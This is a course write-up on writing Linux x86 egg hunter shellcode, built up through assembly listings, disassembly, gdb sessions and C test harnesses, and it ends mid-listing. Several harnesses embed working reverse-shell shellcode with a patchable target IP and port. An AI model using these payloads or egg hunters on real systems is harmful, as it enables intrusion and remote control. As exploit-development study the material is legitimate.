SLAE: Assignment 3 of 7

Assignment #3 objectives:
- Study Egg Hunter shellcode
- Create a working demo of an egghunter
- The egg hunter should be configurable for different payloads
=============================================

Looking on exploit-db.com, there are various egghunter shellcodes available. Most come with detailed explanations of how they work. The goal of this assignment is to study the shellcode to figure out how egghunters work. Upon reading generic egghunter shellcodes, the goal of egghunters is simple: Tag large shellcode with an "egg", and use a very small piece of code - the egg hunter - to find the egg and jump to the egg to execute the shellcode. The reason for egg hunting code is that sometimes, there isn't enough space in memory to store a large piece of exploit code: With an egg hunter, you can store shellcode in any part of memory using other techniques than the actual vulnerability in a program - for instance via program parameters - , search for it, then execute it.

I found the following PDF which details how egg hunters work:
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf

We use the following code as a base:

/*
Source: https://www.exploit-db.com/exploits/37749/
Title: Linux x86 Egg Hunter Shellcode (19 bytes)
Date: 4 August 2015
Author: Guillaume Kaddouch
    Website: http://networkfilter.blogspot.com
    Twitter: @gkweb76
Tested on: Ubuntu 14.04.2 LTS x86, Kali Linux 1.0.9 x86
 
This code was created as an exercise for the 
SecurityTube Linux Assembly Expert (SLAE).
 
Egg signature = 0x50905090 (push eax, nop, push eax, nop)
Usually egg hunters use a 2 * 4 bytes (8 bytes) egg because
the first address check could match the hardcoded egg signature in
the egg hunter itself. As we do not store hardcoded egg signature 
below, it allows us to check only 4 bytes once.
 
egg-hunter.asm:
----------------
 
global _start
 
section .text
 
_start:
        mov eax, addr             ; retrieve a valid address (shorter than using JMP CALL POP)
        mov ebx, dword 0x5090508f ; egg signature altered: 0x50905090 - 1
        inc ebx                   ; fix egg signature in ebx (the purpose is to not store the hardcoded egg signature)
 
next_addr:
        inc eax                   ; increasing memory address to look at next address
        cmp dword [eax], ebx      ; check if our egg is at that memory address, if yes set ZF = 1
        jne next_addr             ; if ZF = 0 (check failed), then jump to next_addr to check next address
        jmp eax                   ; we found our egg (ZF = 1), jump at this address
 
        addr: db 0x1
*/
 
/*
myegg.c:
-----------
Compile with: gcc -fno-stack-protector -z execstack myegg.c -o myegg
*/
 
#include<stdio.h>
#include<string.h>
 
// Egg hunter 19 bytes (\x00 \x0a \x0d free)
unsigned char egghunter[] = \
"\xb8\x72\x80\x04\x08\xbb\x8f\x50\x90\x50\x43\x40\x39\x18\x75"
"\xfb\xff\xe0\x01";
 
// Print 'Egg Found!!' on screen
// You can swap it out with any shellcode you like (as long as you keep the egg mark)
unsigned char shellcode[] = \
"\x90\x50\x90\x50" // egg mark
"\xeb\x16\x59\x31\xc0\x50\xb0\x04\x31\xdb\xb3\x01\x31\xd2\xb2"
"\x0c\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff\x45"
"\x67\x67\x20\x46\x6f\x75\x6e\x64\x21\x21\x0a";
 
main()
{
        printf("Egg hunter shellcode Length:  %d\n", strlen(egghunter));
        int (*ret)() = (int(*)())egghunter;
        ret();
}

Note: We compile the program and execute it:

gcc -fno-stack-protector -z execstack myegg.c -o myegg
./myegg

Egg hunter shellcode Length:  19
Egg Found!!

echo -n $'\xb8\x72\x80\x04\x08\xbb\x8f\x50\x90\x50\x43\x40\x39\x18\x75\xfb\xff\xe0\x01' | ndisasm -u -

00000000  B872800408        mov eax,0x08048072
00000005  BB8F509050        mov ebx,0x5090508f
0000000A  43                inc ebx
0000000B  40                inc eax
0000000C  3918              cmp [eax],ebx
0000000E  75FB              jnz 0xb
00000010  FFE0              jmp eax
00000012  01                db 0x01

Note: I analyze each line in the code:

00000000  B872800408        mov eax,0x08048072
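Sets EAX to 0x08048072, the absolute address that the `addr` label received when the egg hunter was assembled and linked (the label sits at offset 0x12, directly after the hunter's code). The search starts from this address.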

00000005  BB8F509050        mov ebx,0x5090508f
Sets EBX to a value that will become the egg in the next instruction

0000000A  43                inc ebx
Sets EBX to 0x50905090 which is the real egg

Note: The egg code, when executed, does nothing damaging to the execution of the program except for stack corruption:

echo -n $'\x90\x50\x90\x50' | ndisasm -u -

00000000  90                nop
00000001  50                push eax
00000002  90                nop
00000003  50                push eax
Note: If we executed the egg itself, nothing bad would happen except for some stack corruption. If we want a stack-neutral egg, a better option might be to first push eax, then pop it in the next instruction.

0000000B  40                inc eax
Increase EAX by one - this will be jumped to later when searching for the egg

0000000C  3918              cmp [eax],ebx
Compare the egg in EBX, with the code pointed to by EAX

0000000E  75FB              jnz 0xb
If the egg isn't found at EAX, jump to 0000000B to search the next address

00000010  FFE0              jmp eax
If the egg is found, then jump to EAX - which is the egg

00000012  01                db 0x01
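This byte is not an instruction; it exists only to carry the `addr` label. The label's absolute address is fixed when the program is assembled and linked, and the very first instruction loads that address into EAX as the starting point of the search.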

So now that we know how egghunters work we can create our own; let the fun begin!
Now, we need to find a good way to encode our egg value. We can't store the egg directly in our code, because if we do then our egghunter is going to find the egg in the egghunting code instead of the actual shellcode.

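There are two handy instructions, SHL and SHR, which bit-shift a value. Effectively, a SHL by 1 multiplies the register value by 2 and a SHR by 1 divides it by 2. We can use SHL to derive each egg byte from the previous one, so the full egg never appears in the egg hunter itself.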

; Filename: egghunter1.nasm
; Author:  JollyFrogs (frog@jollyfrogs.com)
; Purpose: This assembly code is an egg hunter which looks for egg '\x02\x04\x08\x10'
; Syntax:  NASM (Intel operand order), 32-bit x86
; Method:  Scan memory one byte at a time from a hard-coded start address using
;          SCASB. The egg is never stored whole: only its first byte (0x02) is
;          loaded, and the following bytes are derived by shifting AL left.
; Registers: EDI = scan pointer, AL = egg byte expected next
; NOTE(review): memory is read without any access check, so the scan faults if
;          it reaches an unreadable address before it reaches the egg.
; NOTE(review): SCASB only moves EDI forward while the direction flag is clear;
;          this code does not execute CLD itself.
; NOTE(review): as written only the first TWO egg bytes (0x02, 0x04) are ever
;          compared - see the comments at the second SCASB.

global _start

section .text

_start:
mov edi, 0x08048072      ; hard-coded address at which the scan starts

restart_search:
mov al, byte 0x02        ; AL = first egg byte
egg_not_found:
scasb                ; compare AL with the byte at [EDI]; EDI advances by one whether or not it matches
jne egg_not_found    ; keep scanning until a 0x02 byte is seen
egg_possibly_found:
shl al, 0x1           ; AL = next expected egg byte (0x02 -> 0x04)
cmp al, 0x20          ; intended end-of-egg test; AL is always 0x04 when this line runs
je egg_found          ; NOTE(review): never taken, see above
scasb                ; compare AL (0x04) with the byte following the 0x02
jne restart_search   ; mismatch: reload AL with 0x02 and continue scanning from EDI
                     ; NOTE(review): a match falls through into egg_found instead of
                     ; looping back to egg_possibly_found, so 0x08 and 0x10 are not checked
egg_found:
jmp edi              ; continue execution at EDI, which at this point addresses the third egg byte

Note: We compile our assembly and grab the shellcode:

./compile.sh egghunter1
objdump -d ./egghunter1|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

\xbf\x72\x80\x04\x08\xb0\x02\xae\x75\xfd\xd0\xe0\x3c\x20\x74\x03\xae\x75\xf2\xff\xe7

Let's try our new egghunter!

/*
Filename: myegg2.c
Author: JollyFrogs (frog@jollyfrogs.com)
License: This work is licensed under a Creative Commons
Attribution-NonCommercial 4.0 International License.
Compile:
gcc -m32 -fno-stack-protector -z execstack myegg2.c -o myegg2
*/
#include<stdio.h>
#include<string.h>

unsigned char egghunter[] = \
"\xbf\x72\x80\x04\x08\xb0\x02\xae\x75\xfd\xd0\xe0\x3c\x20\x74\x03\xae\x75\xf2\xff\xe7";

// Print 'Egg Found!!' on screen
// You can swap it out with any shellcode you like (as long as you keep the egg mark)
unsigned char shellcode[] = \
"\x02\x04\x08\x10" // egg mark
"\xeb\x16\x59\x31\xc0\x50\xb0\x04\x31\xdb\xb3\x01\x31\xd2\xb2"
"\x0c\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff\x45"
"\x67\x67\x20\x46\x6f\x75\x6e\x64\x21\x21\x0a";

/*
 * Print the length of the egg hunter, then execute it by calling the
 * egghunter[] byte array through a function pointer (the build uses
 * -z execstack so that the array is executable).
 */
int main(void)
{
    /* strlen() returns size_t, for which %zu is the matching conversion */
    printf("Egg hunter shellcode Length:  %zu\n", strlen((const char *)egghunter));
    int (*ret)(void) = (int (*)(void))egghunter;
    ret();
    return 0;
}

Note: We compile our program and test it:

gcc -m32 -fno-stack-protector -z execstack myegg2.c -o myegg2
./myegg2

Egg hunter shellcode Length:  21
Egg Found!!

Note: Wow that was easy: Didn't even need GDB and the cat's already in the bag!

We can now use the shellcode from assignment 2 and add our egg hunter:

/*
Filename: myegg3.c
Author: JollyFrogs (frog@jollyfrogs.com)
License: This work is licensed under a Creative Commons
Attribution-NonCommercial 4.0 International License.
Compile:
gcc -m32 -fno-stack-protector -z execstack myegg3.c -o myegg3
Shellcode size: 79 Bytes
*/
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdbool.h>

unsigned char egghunter[] = \
"\xbf\x72\x80\x04\x08\xb0\x02\xae\x75\xfd\xd0\xe0\x3c\x20\x74\x03"
"\xae\x75\xf2\xff\xe7";

unsigned char shellcode[] = \
"\x02\x04\x08\x10" // Egg signature
"\x31\xc0\x50\x40\x50\x5b\x50\x40\x50\xb0\x66\x89\xe1\xcd\x80\x97"
"\xb8\x7f\x01\x01\x01\x50\x66\xb8\x15\xb3\x43\x66\x50\x66\x53\x43"
"\x89\xe1\x31\xc0\xb0\x10\x50\x51\x57\xb0\x66\x89\xe1\xcd\x80\x87"
"\xcb\x87\xdf\x49\xb0\x3f\xcd\x80\x75\xf9\x50\x50\x59\x5a\x50\xb0"
"\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xcd\x80";

/*
 * Report whether shellcode[] is free of 0x00 bytes.
 * Prints the index of the first zero byte found and returns false;
 * returns true when there is none.
 */
static bool shellcode_zerocheck() {
// loop index
int i = 0;
// sizeof(shellcode)-1 leaves out the terminating NUL appended by the string literal
for(i = 0; i < sizeof(shellcode)-1; i++) {
if (shellcode[i] == '\x00') {
printf("Zero found in shellcode at position %i\n",i);
return false;
}
}
// No zero byte anywhere in the shellcode
return true;
}

/*
 * Report whether egghunter[] is free of 0x00 bytes.
 * Prints the index of the first zero byte found and returns false;
 * returns true when there is none.
 */
static bool egghunter_zerocheck() {
// loop index
int i = 0;
// sizeof(egghunter)-1 leaves out the terminating NUL appended by the string literal
for(i = 0; i < sizeof(egghunter)-1; i++) {
if (egghunter[i] == '\x00') {
printf("Zero found in egghunter at position %i\n",i);
return false;
}
}
// No zero byte anywhere in the egg hunter
return true;
}

/*
 * Overwrite two bytes of buf with `port`, high byte first.
 * Returns false when port is outside 1024..65535, or (after printing a
 * message) when one of the two bytes is 0x00; returns true otherwise.
 * The bytes are written before the zero check, so buf is modified even
 * when the function then returns false.
 */
static bool shellcode_settargetport(char *buf, int port) {
// Reject ports outside 1024..65535
if (port<1024 || port>65535) return false;
// Index in buf at which the two port bytes (\x15\xb3 in the template) are expected.
// NOTE(review): shellcode[] in this listing begins with a 4-byte egg, which puts
// \x15\xb3 at index 28; 24 is their index without the egg - confirm the offset.
int port_offset = 24; // (\x15\xb3)
// Store the port as a 16-bit value (low byte first on x86)
*(short *)(buf+port_offset) = port; // (\x15\xb3) - shellcode array counts from 0
// Swap the two bytes so that the high byte comes first (presumably network byte order)
char tmp = buf[port_offset];
buf[port_offset] = buf[port_offset+1];
buf[port_offset+1] = tmp;
// Reject a port whose bytes contain 0x00.
// NOTE(review): this reads the global shellcode[] rather than buf; main passes
// shellcode as buf, so both refer to the same array there.
if (shellcode[port_offset] == '\x00' || shellcode[port_offset+1] == '\x00') {
printf("port HEX contains zeroes\n"); return false;
}
// Return true if all checks passed
return true;
}

/*
 * Parse the decimal fields of `ip` and write four bytes into buf.
 * Returns false (after printing a message) as soon as a written byte is
 * 0x00; returns true otherwise. Bytes written before a failure stay in buf.
 */
static bool shellcode_settargetip(char *buf, char *ip) {
// Index in buf at which the four address bytes are expected.
// NOTE(review): shellcode[] in this listing begins with a 4-byte egg, which puts
// \x7f\x01\x01\x01 at index 21; 17 is their index without the egg - confirm the offset.
int ip_offset = 17; // (\x7f\x01\x01\x01\)
unsigned char value[4] = {0};
size_t index = 0;
// Accumulate decimal digits into value[index]; any non-digit character moves on to the next field.
// NOTE(review): index is not bounded, so more than three non-digit characters
// make the digit branch write past value[3]; fields above 255 wrap in the unsigned char.
while (*ip) {
if (isdigit((unsigned char)*ip)) {
value[index] *= 10;
value[index] += *ip - '0';
} else {
index++;
}
ip++;
}
// Copy the four parsed bytes into buf, rejecting any 0x00 byte.
// NOTE(review): the check reads the global shellcode[] rather than buf, and the
// message text says "port" although an address byte is being checked.
int i = 0; for(i = 0; i < 4; i++) {
*(char *)(buf+ip_offset+i) = value[i];
if (shellcode[ip_offset+i] == '\x00'){printf("port HEX contains zeroes\n"); return false;}
}
// Return true if all checks passed
return true;
}

/*
 * Demo driver: patch port and IP into shellcode[], check both byte arrays
 * for 0x00 bytes, print the shellcode length, then jump to the egg hunter.
 * Every failed check prints an ERROR line and returns 0.
 */
main () {
// Port in decimal - accepted range is 1024..65535
int targetport = 1234;
char *targetip = "127.1.1.1";
// Patch the shellcode, then make sure neither array contains a zero byte
if (!shellcode_settargetport(shellcode, targetport)) {printf("ERROR: Invalid targetport\n");return 0;}
if (!shellcode_settargetip(shellcode, targetip)) {printf("ERROR: Invalid targetip\n");return 0;}
if (!shellcode_zerocheck()) {printf("ERROR: Shellcode contains zeroes\n");return 0;}
if (!egghunter_zerocheck()) {printf("ERROR: Egghunter contains zeroes\n");return 0;}
// Print shellcode length (egg included, since the egg is part of the array).
printf("Shellcode Length:  %d\n", strlen(shellcode));
// Hand control to the egg hunter
__asm__ (
// Fill the registers with a recognisable pattern so the hunter cannot rely on leftover values
"movl $0x12345678, %eax\n\t"
"movl $0x12345678, %ebx\n\t"
"movl $0x12345678, %ecx\n\t"
"movl $0x12345678, %edx\n\t"
"movl $0x12345678, %edi\n\t"
"movl $0x12345678, %esi\n\t"
"movl $0x12345678, %ebp\n\t"
// jump to the first byte of the egghunter[] array
"jmp egghunter");
}

Note: We compile our program and run it in gdb:

gcc -m32 -fno-stack-protector -z execstack myegg3.c -o myegg3
./myegg3

Shellcode Length:  83
Segmentation fault (core dumped)

Note: Upon running the code, we receive a segmentation fault. It seems this cat managed to slip out of the bag somehow. Using gdb, I found that the cause of the segfault is due to the egghunter searching in areas of memory that it had no access to. I thus had to come up with a new egghunter that checks the memory space for read access before trying to read it. I did some research and found the following document: http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf I will use Skape's egg hunter as a basis for my egghunter:

;skape.nasm
;Skape's original egghunter
xor edx,edx
or dx,0xfff
inc edx
lea ebx,[edx+0x4]
push byte +0x21
pop eax
int 0x80
cmp al,0xf2
jz 0x2
mov eax,0x50905090
mov edi,edx
scasd
jnz 0x7
scasd
jnz 0x7
jmp edi

This is what I came up with:

; Filename: egghunter2.nasm
; Author:  JollyFrogs (frog@jollyfrogs.com)
; egg: \x02\x04\x08\x10
; Syntax:  NASM (Intel operand order), 32-bit x86 Linux (int 0x80 system calls)
; Method:  Walk the address space in EDX. Each candidate address is first
;          passed to access(2) as the pathname pointer; a result whose low
;          byte is 0xF2 makes the hunter skip to the next 4 KiB page.
;          Otherwise the bytes at EDX are compared with the egg, whose bytes
;          are derived by shifting AL left instead of being stored.
; Registers: EDX = candidate address, EBX = pointer passed to access(),
;            ECX = mode passed to access(), CL = first egg byte,
;            EDI = compare pointer (advanced by SCASB), AL = expected egg byte
; NOTE(review): only CL is initialised; the upper 24 bits of ECX keep whatever
;          value they had on entry, and all of ECX is used as the mode argument.
; NOTE(review): SCASB only moves EDI forward while the direction flag is clear;
;          this code does not execute CLD itself.

global _start

section .text
_start:
mov cl, byte 0x02     ; CL = first egg byte (0x02)
xor edx,edx           ; EDX = 00000000
next_page:
or dx,0xfff           ; set the low 12 bits of EDX: last byte of the current 4 KiB page
next_byte_in_page:
inc edx               ; next candidate address (from ...FFF this steps onto the next page)
lea ebx,[edx+0x4]     ; EBX = EDX + 4, the pointer that access() is asked about
push byte +0x21       ; PUSH 21
pop eax               ; EAX = 00000021 = SYSCALL.ACCESS(2)
int 0x80              ; SYSCALL.ACCESS(2)
cmp al,0xf2           ; low byte 0xF2: pointer not accessible
jz next_page          ; if no access to memory then move on to the next page
mov edi,edx           ; EDI = candidate address
mov al, cl            ; AL = 02
scasb                 ; compare AL with the byte at [EDI]; EDI advances by one
jne next_byte_in_page ; first egg byte not here: try the next address
egg_possibly_found:
shl al, 0x1           ; AL = next expected egg byte: 02 -> 04 -> 08 -> 10 -> 20
cmp al, 0x20          ; AL reaches 20 only after 02, 04, 08 and 10 have all matched
je egg_found
scasb                 ; compare AL with the byte at [EDI]; EDI advances by one
je egg_possibly_found ; byte matched: go on to the next egg byte
jmp next_byte_in_page ; mismatch: resume the search at EDX + 1
egg_found:
jmp edi               ; EDI addresses the byte after the egg: continue execution there

Note: We compile our egghunter assembly code and grab the shellcode bytes:

nasm -f elf32 -o egghunter2.o egghunter2.nasm && ld -o egghunter2 egghunter2.o
objdump -d ./egghunter2|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

"\xb1\x02\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58"
"\xcd\x80\x3c\xf2\x74\xee\x89\xd7\x88\xc8\xae\x75\xec\xd0\xe0\x3c"
"\x20\x74\x05\xae\x74\xf7\xeb\xe1\xff\xe7"

/*
Filename: myegg4.c
Author: JollyFrogs (frog@jollyfrogs.com)
License: This work is licensed under a Creative Commons
Attribution-NonCommercial 4.0 International License.
Compile:
gcc -m32 -fno-stack-protector -z execstack myegg4.c -o myegg4
*/
#include<stdio.h>
#include<string.h>

unsigned char egghunter[] = \
"\xb1\x02\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58"
"\xcd\x80\x3c\xf2\x74\xee\x89\xd7\x88\xc8\xae\x75\xec\xd0\xe0\x3c"
"\x20\x74\x05\xae\x74\xf7\xeb\xe1\xff\xe7";

// Print "Egg Found!!" on screen
// You can swap it out with any shellcode you like (as long as you keep the egg mark)
unsigned char shellcode[] = \
"\x02\x04\x08\x10" // egg mark
"\xeb\x16\x59\x31\xc0\x50\xb0\x04\x31\xdb\xb3\x01\x31\xd2\xb2"
"\x0c\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff\x45"
"\x67\x67\x20\x46\x6f\x75\x6e\x64\x21\x21\x0a";

/*
 * Print the length of the egg hunter, then execute it by calling the
 * egghunter[] byte array through a function pointer (the build uses
 * -z execstack so that the array is executable).
 */
int main(void)
{
    /* strlen() returns size_t, for which %zu is the matching conversion */
    printf("Egg hunter shellcode Length:  %zu\n", strlen((const char *)egghunter));
    int (*ret)(void) = (int (*)(void))egghunter;
    ret();
    return 0;
}

Note: We compile our new program and test it again:

gcc -m32 -fno-stack-protector -z execstack myegg4.c -o myegg4
./myegg4

Egg hunter shellcode Length:  42
Egg Found!!

Note: Oh, yes... Cat back in that bag! Our egghunter shellcode doubled in size, but it is more reliable. If it works, we can look at optimizing this code later. Let's give it a try.

/*
Filename: myegg5.c
Author: JollyFrogs (frog@jollyfrogs.com)
License: This work is licensed under a Creative Commons
Attribution-NonCommercial 4.0 International License.
Compile:
gcc -m32 -fno-stack-protector -z execstack myegg5.c -o myegg5
Shellcode size: 79 Bytes
*/
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdbool.h>

unsigned char egghunter[] = \
"\xb1\x02\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58"
"\xcd\x80\x3c\xf2\x74\xee\x89\xd7\x88\xc8\xae\x75\xec\xd0\xe0\x3c"
"\x20\x74\x05\xae\x74\xf7\xeb\xe1\xff\xe7";

unsigned char shellcode[] = \
"\x02\x04\x08\x10" // Egg signature
"\x90\x90\x90\x90" // nop chain
"\x31\xc0\x50\x40\x50\x5b\x50\x40\x50\xb0\x66\x89\xe1\xcd\x80\x97"
"\xb8\x7f\x01\x01\x01\x50\x66\xb8\x15\xb3\x43\x66\x50\x66\x53\x43"
"\x89\xe1\x31\xc0\xb0\x10\x50\x51\x57\xb0\x66\x89\xe1\xcd\x80\x87"
"\xcb\x87\xdf\x49\xb0\x3f\xcd\x80\x75\xf9\x50\x50\x59\x5a\x50\xb0"
"\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xcd\x80";

/*
 * Report whether shellcode[] is free of 0x00 bytes.
 * Prints the index of the first zero byte found and returns false;
 * returns true when there is none.
 */
static bool shellcode_zerocheck() {
// loop index
int i = 0;
// sizeof(shellcode)-1 leaves out the terminating NUL appended by the string literal
for(i = 0; i < sizeof(shellcode)-1; i++) {
if (shellcode[i] == '\x00') {
printf("Zero found in shellcode at position %i\n",i);
return false;
}
}
// No zero byte anywhere in the shellcode
return true;
}

/*
 * Report whether egghunter[] is free of 0x00 bytes.
 * Prints the index of the first zero byte found and returns false;
 * returns true when there is none.
 */
static bool egghunter_zerocheck() {
// loop index
int i = 0;
// sizeof(egghunter)-1 leaves out the terminating NUL appended by the string literal
for(i = 0; i < sizeof(egghunter)-1; i++) {
if (egghunter[i] == '\x00') {
printf("Zero found in egghunter at position %i\n",i);
return false;
}
}
// No zero byte anywhere in the egg hunter
return true;
}

/*
 * Overwrite two bytes of buf with `port`, high byte first.
 * Returns false when port is outside 1024..65535, or (after printing a
 * message) when one of the two bytes is 0x00; returns true otherwise.
 * The bytes are written before the zero check, so buf is modified even
 * when the function then returns false.
 */
static bool shellcode_settargetport(char *buf, int port) {
// Reject ports outside 1024..65535
if (port<1024 || port>65535) return false;
// Index in buf at which the two port bytes (\x15\xb3 in the template) are expected.
// NOTE(review): shellcode[] in this listing begins with a 4-byte egg and a 4-byte
// nop chain, which puts \x15\xb3 at index 32; 24 is their index without that
// prefix - confirm the offset.
int port_offset = 24; // (\x15\xb3)
// Store the port as a 16-bit value (low byte first on x86)
*(short *)(buf+port_offset) = port; // (\x15\xb3) - shellcode array counts from 0
// Swap the two bytes so that the high byte comes first (presumably network byte order)
char tmp = buf[port_offset];
buf[port_offset] = buf[port_offset+1];
buf[port_offset+1] = tmp;
// Reject a port whose bytes contain 0x00.
// NOTE(review): this reads the global shellcode[] rather than buf; main passes
// shellcode as buf, so both refer to the same array there.
if (shellcode[port_offset] == '\x00' || shellcode[port_offset+1] == '\x00') {
printf("port HEX contains zeroes\n"); return false;
}
// Return true if all checks passed
return true;
}

/*
 * Parse the decimal fields of `ip` and write four bytes into buf.
 * Returns false (after printing a message) as soon as a written byte is
 * 0x00; returns true otherwise. Bytes written before a failure stay in buf.
 */
static bool shellcode_settargetip(char *buf, char *ip) {
// Index in buf at which the four address bytes are expected.
// NOTE(review): shellcode[] in this listing begins with a 4-byte egg and a 4-byte
// nop chain, which puts \x7f\x01\x01\x01 at index 25; 17 is their index without
// that prefix - confirm the offset.
int ip_offset = 17; // (\x7f\x01\x01\x01\)
unsigned char value[4] = {0};
size_t index = 0;
// Accumulate decimal digits into value[index]; any non-digit character moves on to the next field.
// NOTE(review): index is not bounded, so more than three non-digit characters
// make the digit branch write past value[3]; fields above 255 wrap in the unsigned char.
while (*ip) {
if (isdigit((unsigned char)*ip)) {
value[index] *= 10;
value[index] += *ip - '0';
} else {
index++;
}
ip++;
}
// Copy the four parsed bytes into buf, rejecting any 0x00 byte.
// NOTE(review): the check reads the global shellcode[] rather than buf, and the
// message text says "port" although an address byte is being checked.
int i = 0; for(i = 0; i < 4; i++) {
*(char *)(buf+ip_offset+i) = value[i];
if (shellcode[ip_offset+i] == '\x00'){printf("port HEX contains zeroes\n"); return false;}
}
// Return true if all checks passed
return true;
}

/*
 * Demo driver: patch port and IP into shellcode[], check both byte arrays
 * for 0x00 bytes, print both lengths, then jump to the egg hunter.
 * Every failed check prints an ERROR line and returns 0.
 */
main () {
// Port in decimal - accepted range is 1024..65535
int targetport = 1234;
char *targetip = "127.1.1.1";
// Patch the shellcode, then make sure neither array contains a zero byte
if (!shellcode_settargetport(shellcode, targetport)) {printf("ERROR: Invalid targetport\n");return 0;}
if (!shellcode_settargetip(shellcode, targetip)) {printf("ERROR: Invalid targetip\n");return 0;}
if (!shellcode_zerocheck()) {printf("ERROR: Shellcode contains zeroes\n");return 0;}
if (!egghunter_zerocheck()) {printf("ERROR: Egghunter contains zeroes\n");return 0;}
// Print the lengths of both byte arrays (the shellcode length includes its prefix bytes).
printf("Shellcode Length:  %d\n", strlen(shellcode));
printf("Egghunter Length:  %d\n", strlen(egghunter));
// Hand control to the egg hunter
__asm__ (
// Fill the registers with a recognisable pattern so the hunter cannot rely on leftover values
"movl $0x12345678, %eax\n\t"
"movl $0x12345678, %ebx\n\t"
"movl $0x12345678, %ecx\n\t"
"movl $0x12345678, %edx\n\t"
"movl $0x12345678, %edi\n\t"
"movl $0x12345678, %esi\n\t"
"movl $0x12345678, %ebp\n\t"
// jump to the first byte of the egghunter[] array
"jmp egghunter");
}

Note: We compile the latest revision of our program (with the gcc command given in the file header) and run it:

./myegg5

Shellcode Length:  87
Egghunter Length:  42
Segmentation fault (core dumped)

Note: Hm.. another segfault... not looking good - let's see what's going on

gdb myegg5 -ex 'break *&egghunter+5' -ex 'run'

--------------------------------------------------------------------------[regs] EAX: 0xFFFFFFEA  EBX: 0x00001004  ECX: 0x12345602  EDX: 0x00001000  o d I t S z a p C
ESI: 0x12345678  EDI: 0x12345678  EBP: 0x12345678  ESP: 0xBFFFF340  EIP: 0x0804A054
CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B  Jump is NOT taken (z!=1)
--------------------------------------------------------------------------[code] => 0x804a054 <egghunter+20>:    je     0x804a044 <egghunter+4>
Note: We can see that EAX is 0xFFFFFFEA
Note: The error code is in two's complement value. It can be decoded as follows into the decimal equivalent error code:
0xFFFFFFFF - 0xFFFFFFEA + 1 = 22

cat /usr/include/asm-generic/errno-base.h

Code 22 means EINVAL. We can look up what that means as follows:

man 2 access

ERRORS
access() shall fail if:
EACCES        The requested access would be denied to the file, or search permission is denied for one
of the directories in the path prefix of pathname.  (See also path_resolution(7).)
ELOOP         Too many symbolic links were encountered in resolving pathname.
ENAMETOOLONG  pathname is too long.
ENOENT        A component of pathname does not exist or is a dangling symbolic link.
ENOTDIR       A component used as a directory in pathname is not, in fact, a directory.
EROFS         Write permission was requested for a file on a read-only file system.

access() may fail if:
EFAULT        pathname points outside your accessible address space.
 EINVAL        mode was incorrectly specified.
EIO           An I/O error occurred.
ENOMEM        Insufficient kernel memory was available.
ETXTBSY       Write access was requested to an executable which is being executed.

Note: We see the following: EINVAL - mode was incorrectly specified.
Running the program in gdb and checking the arguments to access(), we find that ECX, the register that holds the "mode" argument, isn't set properly (ECX is 0x12345602 just before the INT 0x80 instruction). The "man 2 access" command further reveals the valid values for the "mode" parameter: either F_OK, or a mask made up of one or more of R_OK, W_OK, and X_OK. Since we're checking for read access to the memory, we need to set R_OK. So how can we find what R_OK maps to?

cat /usr/include/unistd.h | grep R_OK

#define   R_OK  4  /* Test for read permission. */
Note: So ECX should be set to 4 if we want to check R_OK, or 0 if we want to check F_OK. We modify the assembly language and recompile.

; Filename: egghunter3.nasm
; Author:  JollyFrogs (frog@jollyfrogs.com)
; egg: \x01\x02\x04\x08\x10\x20
; Syntax:  NASM (Intel operand order), 32-bit x86 Linux (int 0x80 system calls)
; Method:  Walk the address space in EDX. Each candidate address is first
;          passed to access(2) as the pathname pointer, with mode 0 (F_OK);
;          a result whose low byte is 0xF2 (EFAULT) makes the hunter skip to
;          the next 4 KiB page. Otherwise the bytes at EDX are compared with
;          the egg, whose bytes are derived by shifting AL left instead of
;          being stored.
; Registers: EDX = candidate address, EBX = pointer passed to access(),
;            ECX = mode passed to access() (0), EDI = compare pointer
;            (advanced by SCASB), AL = expected egg byte
; NOTE(review): only the byte at EDX is probed; the up to five further bytes
;          read by the later SCASBs are not separately validated.
; NOTE(review): SCASB only moves EDI forward while the direction flag is clear;
;          this code does not execute CLD itself.

global _start

section .text
_start:
xor ecx,ecx           ; ECX = 00000000 (F_OK)
mul ecx               ; EDX:EAX = EAX * 0, so EAX = 00000000 and EDX = 00000000
next_page:
or dx,0xfff           ; set the low 12 bits of EDX: last byte of the current 4 KiB page
next_byte_in_page:
inc edx               ; next candidate address (from ...FFF this steps onto the next page)
lea ebx,[edx]         ; EBX = EDX, the pointer that access() is asked about
push byte +0x21       ; PUSH 21
pop eax               ; EAX = 00000021 = SYSCALL.ACCESS(2)
int 0x80              ; SYSCALL.ACCESS(2)
cmp al,0xf2           ; F2 = EFAULT = No access to memory
je next_page          ; if no access to memory then move on to the next page
mov edi,edx           ; EDI = candidate address
salc                  ; AL = 00 when CF is clear, FF when CF is set
                      ; NOTE(review): CF comes from the cmp above, so AL = 00 relies on
                      ; the returned low byte being >= 0xF2 - confirm for other results
inc eax               ; AL = 01 (first egg byte) when AL was 00
scasb                 ; compare AL with the byte at [EDI]; EDI advances by one
jne next_byte_in_page ; first egg byte not here: try the next address
egg_possibly_found:
shl al,0x1           ; AL = next expected egg byte: 01 -> 02 -> 04 -> 08 -> 10 -> 20 -> 40
cmp al,0x40          ; AL reaches 40 only after all six egg bytes have matched
je egg_found
scasb                 ; compare AL with the byte at [EDI]; EDI advances by one
je egg_possibly_found ; byte matched: go on to the next egg byte
